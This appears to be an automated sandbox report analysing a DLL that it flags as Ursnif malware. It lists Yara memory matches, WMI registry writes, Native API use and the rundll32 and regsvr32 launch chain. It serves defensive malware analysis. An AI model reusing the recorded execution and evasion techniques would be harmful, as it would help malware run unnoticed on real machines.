Source: Yara match	File source: 00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4240, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_007A35A1

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A18D1 GetProcAddress,NtCreateSection,memset,	0_2_6D4A18D1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A1B89 NtMapViewOfSection,	0_2_6D4A1B89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2485 NtQueryVirtualMemory,	0_2_6D4A2485
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_007A3CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A81CD NtQueryVirtualMemory,	2_2_007A81CD

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2264	0_2_6D4A2264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E69B1	0_2_6D4E69B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A6609	2_2_007A6609
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A7FA8	2_2_007A7FA8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4E69B1	2_2_6D4E69B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4E69B1	3_2_6D4E69B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4E69B1	5_2_6D4E69B1

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D4E05B7 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D4DBE70 appears 60 times

Source: 1.dll

Binary or memory string: OriginalFilenamePitch.dll8 vs 1.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: 1.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 1.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winDLL@43/153@26/5

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_007A19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_007A19E7

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B10F1F20-C49D-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF0C5126AEADFE7CF3.TMP

Jump to behavior

Source: 1.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\1.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\1.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17428 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17436 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17444 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17452 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17460 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17464 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83012 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17482 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17490 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83032 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17512 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17520 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17528 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83064 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17542 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\1.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17428 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17436 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17444 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17452 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17460 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17464 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83012 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17482 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17490 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83032 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17512 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17520 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17528 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83064 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17542 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 1.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 1.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4A1F31 LoadLibraryA,GetProcAddress,

0_2_6D4A1F31

Source: 1.dll

Static PE information: real checksum: 0x72cef should be: 0x733e6

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2253 push ecx; ret	0_2_6D4A2263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2200 push ecx; ret	0_2_6D4A2209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B2536 push ss; retf	0_2_6D4B25A6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B44A0 push edx; iretd	0_2_6D4B44A1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4AF75E pushfd ; ret	0_2_6D4AF764
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4AEF96 push es; retf	0_2_6D4AEF97
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B2E34 push ecx; retf	0_2_6D4B2E3A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B1132 push ss; iretd	0_2_6D4B1133
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B01D1 push ebp; ret	0_2_6D4B01D2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B19E2 push edi; ret	0_2_6D4B19E3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B1080 push ss; iretd	0_2_6D4B10B1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D50DE70 push esp; retf	0_2_6D50DE72
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007AB67C push ss; retf	2_2_007AB690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A7C20 push ecx; ret	2_2_007A7C29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007AB163 push edx; iretd	2_2_007AB164
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A7F97 push ecx; ret	2_2_007A7FA7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B2536 push ss; retf	2_2_6D4B25A6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B44A0 push edx; iretd	2_2_6D4B44A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4AF75E pushfd ; ret	2_2_6D4AF764
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4AEF96 push es; retf	2_2_6D4AEF97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B2E34 push ecx; retf	2_2_6D4B2E3A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B1132 push ss; iretd	2_2_6D4B1133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B01D1 push ebp; ret	2_2_6D4B01D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B19E2 push edi; ret	2_2_6D4B19E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4B1080 push ss; iretd	2_2_6D4B10B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D50DE70 push esp; retf	2_2_6D50DE72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4B2536 push ss; retf	3_2_6D4B25A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4B44A0 push edx; iretd	3_2_6D4B44A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4AF75E pushfd ; ret	3_2_6D4AF764
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4AEF96 push es; retf	3_2_6D4AEF97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4B2E34 push ecx; retf	3_2_6D4B2E3A

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6d4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.ad8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.418cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.968cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ab8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6d4a0000.6.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4240, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 7160, type: MEMORY
